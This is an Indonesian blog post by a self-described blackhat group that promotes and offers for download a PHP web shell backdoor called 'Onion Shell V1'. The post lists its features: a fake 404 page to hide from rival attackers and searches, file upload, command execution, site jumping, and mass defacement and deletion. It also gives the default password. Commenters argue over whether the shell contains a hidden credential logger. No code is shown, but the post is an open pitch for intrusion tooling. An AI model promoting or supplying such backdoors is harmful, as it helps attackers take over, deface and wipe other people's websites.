Rabu, 28 Maret 2018

Onion Shell

hae para jones!1!1!1!1


Dah  lama kagak post :V kali ini mimin pengen berbagi shell backdoor Onion Shell V1.
Onion Shell adalah shell pertama Idiot BlackHat, kenapa namanya onion? karena banyak defecel wibu awoakwoakwoakwk :V kami memilih nama Onion Shell karena pertama alasannya banyak defecel wibu dan kedua kalo kyta dorking Onion shell yang akan muncul adalah jenis-jenis makanan, jadi bisa dikatakan shell ini anti dorking :) Di shell ini toolsnya agak sedikit karena baru versi pertama.

            Oh iya shell ini kagak 100% hasil ngoding anak Idiot BlackHat tapi beberapa tools dan code kami ambil dari shell lain :) sebelumnya saya berterima kasih kepada orang-orang yang membantu pembuatan shell ini :)

okey langsung saja kita bahas yang ada didalam shell ini
fitur-fitur yang ada dalam shell ini adalah

  • 404 login page


Baru-baru ini banyak para defecel galo dan marah-marah mulu karena shelllnya kena tykung :V tapi tenang saja, di shell ini memiliki fitur login page 404 yang mampu berkamuplase menjadi not found :V sehingga shell ini agak sulit ditykung dan di dorking :V

  • upload
Di dalam shell ini memiliki dua jenis upload, yaitu uploader biasa dan uploader home root

  • command
  • jumping
  • mass deface dan mass delete
Kebanyakan para defecel zaman now sering pake tools mass deface dan mass delete karena mereka takut ditykung webnya :V oleh kerena itu kami sediakan fitur ini untuk kalian yang takut ditykung

  • ukuran kecil
Selain memiliki fitur-fitur diatas kyta juga perkecil ukuran shell ini menjadi 10kb :V kenapa kyta kecilkan? karena banyak web yang kagak bisa di tempel shell gede :V



password default "baubawang"


Itulah beberapa fitur yang ada dalam shell ini :)
tertarik? klik aja dibawah ini
download langsung



sekian dulu ea :* sampai berjumpa lagi  :*

5 komentar

Jangan sebar shell yang ada loggernya.
Proof: https://api.whatsapp.com/send?phone=6285237048641

coba download lagi dan decode dan lihat lagi gan :)
loggernya sudah dihapus kok :)

Shellnya nggak ada tempat loginnya


EmoticonEmoticon